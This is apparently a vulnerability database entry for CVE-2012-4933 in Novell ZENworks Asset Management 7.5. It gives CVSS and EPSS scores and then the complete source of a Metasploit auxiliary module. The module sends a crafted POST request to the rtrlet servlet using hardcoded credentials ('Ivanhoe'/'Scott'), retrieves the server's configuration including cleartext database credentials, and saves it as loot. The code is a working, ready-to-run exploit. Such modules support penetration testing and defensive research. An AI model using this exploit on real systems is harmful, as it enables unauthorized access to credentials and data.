Lucene search

Juan vazquez <[email protected]>MSF:AUXILIARY-SCANNER-HTTP-ZENWORKS_ASSETMANAGEMENT_GETCONFIG-

HistoryOct 15, 2012 - 2:03 p.m.

Novell ZENworks Asset Management 7.5 Configuration Access

2012-10-1514:03:19

juan vazquez <[email protected]>

www.rapid7.com

7.8 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:C/I:N/A:N

6.9 Medium

AI Score

Confidence

Low

0.971 High

EPSS

Percentile

99.8%

JSON

This module exploits a hardcoded user and password for the GetConfig maintenance task in Novell ZENworks Asset Management 7.5. The vulnerability exists in the Web Console and can be triggered by sending a specially crafted request to the rtrlet component, allowing a remote unauthenticated user to retrieve the configuration parameters of Novell Zenworks Asset Management, including the database credentials in clear text. This module has been successfully tested on Novell ZENworks Asset Management 7.5.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Novell ZENworks Asset Management 7.5 Configuration Access',
      'Description'    => %q{
          This module exploits a hardcoded user and password for the GetConfig maintenance
        task in Novell ZENworks Asset Management 7.5. The vulnerability exists in the Web
        Console and can be triggered by sending a specially crafted request to the rtrlet component,
        allowing a remote unauthenticated user to retrieve the configuration parameters of
        Novell Zenworks Asset Management, including the database credentials in clear text.
        This module has been successfully tested on Novell ZENworks Asset Management 7.5.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'juan vazquez' # Also the discoverer
        ],
      'References'     =>
        [
          [ 'CVE', '2012-4933' ],
          [ 'URL', 'https://www.rapid7.com/blog/post/2012/10/11/cve-2012-4933-novell-zenworks/' ]
        ]
    ))

    register_options(
      [
        Opt::RPORT(8080),
      ])
  end

  def run_host(ip)

    post_data = "kb=&file=&absolute=&maintenance=GetConfigInfo_password&username=Ivanhoe&password=Scott&send=Submit"

    print_status("#{rhost}:#{rport} - Sending request...")
    res = send_request_cgi({
      'uri'          => '/rtrlet/rtr',
      'method'       => 'POST',
      'data'         => post_data,
    }, 5)

    if res and res.code == 200 and res.body =~ /<b>Rtrlet Servlet Configuration Parameters \(live\)<\/b><br\/>/
      print_good("#{rhost}:#{rport} - File retrieved successfully!")
      path = store_loot(
        'novell.zenworks_asset_management.config',
        'text/html',
        ip,
        res.body,
        nil,
        "Novell ZENworks Asset Management Configuration"
      )
      print_status("#{rhost}:#{rport} - File saved in: #{path}")
    else
      print_error("#{rhost}:#{rport} - Failed to retrieve configuration")
      return
    end

  end
end